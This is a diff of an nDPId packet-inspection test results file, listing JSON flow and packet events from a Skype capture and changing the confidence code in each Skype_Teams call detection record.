+00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1431970650909,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970650909,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIpxWyCXC803gcKyPMKASOJCo1gAAAgQFrAQCCApOqL1kPjHFcQEDAwk="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1431970650910,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970650910,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0eB9AAEAG4PLAqAEinTeCsMglnFZwrI8wwvNN4YAQECz\/hAAAAQEICj4xxe1OqL1k"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":658,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651380,"flow_last_seen":1431970651380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970651380,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -286,102 +286,102 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1431970651677,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970651677,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0CgxAAEAGtOPAqAEib91KLcgoAbtIes+zDU2rDIAQECxN5QAAAQEICj4xyOdNh63L"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1431970651850,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970651850,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9fnAAAEARsRvAqAEi1cezkjLdgQkAKdgxevUC7H9CpX1vDFjUgifamALKVmn9IG\/Fgz6DNfXKD8OP"} 
-00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":681,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.160","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1431970651850,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970651850,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/x4wAAEARZ+\/AqAEi1cezoDLdnF4AKxOyevcCGvABkprWeh8EUhOC0BCTnmpfRyuj2xsq6jfI1V+MUC4="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.160","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.160","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":682,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1431970651850,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970651850,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1mAEAAEART6jAqAEinTg0DDLdnF8AIfBgevkCw9fuW226FZ\/i0VkBrMngLZ\/OvlepsQ=="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":682,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":682,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":683,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1431970651850,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970651850,"pkt":"0NQSxnP1PBXCt3IOCABFAABAT+gAAEAREWjAqAEiQAQXjzLdnFIALKj4evsCuV\/AUAbJFwXr2TpK\/p9BHGpZ+kg1tywBGmcFc5l3l+UA"} 
-00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":683,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":683,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":684,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.174","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1431970651850,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970651850,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5DD0AAEARIzfAqAEi1cezrjLdnFkAJTHjev0CDsFSgVTjU3l7SB\/6pLcIO\/MFhUO5HKYdIt4="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.174","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.174","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":699,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652388,"flow_last_seen":1431970652388,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970652388,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51241,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":699,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1431970652388,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970652388,"pkt":"0NQSxnP1PBXCt3IOCABFAABAw4RAAEAGlYHAqAEinTeCsMgpAbtXW5NMAAAAALAC\/\/+W4QAAAgQFtAEDAwUBAQgKPjHLqwAAAAAEAgAA"} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":701,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1431970652513,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970652513,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIgG7yCm78+IiV1uTTaASOJDDlAAAAgQFrAQCCApOqL71PjHLqwEDAwk="} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1431970652513,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970652513,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+sxAAEAGXkXAqAEinTeCsMgpAbtXW5NNu\/PiI4AQECwaQwAAAQEICj4xzCdOqL71"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1431970652859,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970652859,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyWSMAAEARpePAqAEib91KDTLdnEkAHvqKev8C0IwzOBgB3UEKOkJTX5CI9Vwhwg=="} 
-00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":708,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1431970652859,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970652859,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1DNUAAEAR8g3AqAEib91KLjLdnFsAIUKoewECUhceSedyogxjoY07gc663Yk4liOtLw=="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":708,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":708,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":709,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.174","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":709,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1431970652859,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970652859,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6I1wAAEARDKfAqAEinTfrrjLdnFMAJnmaewMCB1Y35rB9hiYgpWTMLw7QXUk3fDnH35+GDlnt"} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":709,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.174","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":709,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.174","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.22","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1431970652859,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970652859,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8IkgAAEARdlHAqAEiQTffFjLdnEkAKNsyewUCeMezn62nslRHzPMr8rZBDWA5jghU5oMMawkbl98="} 
-00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":710,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.22","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":710,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.22","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 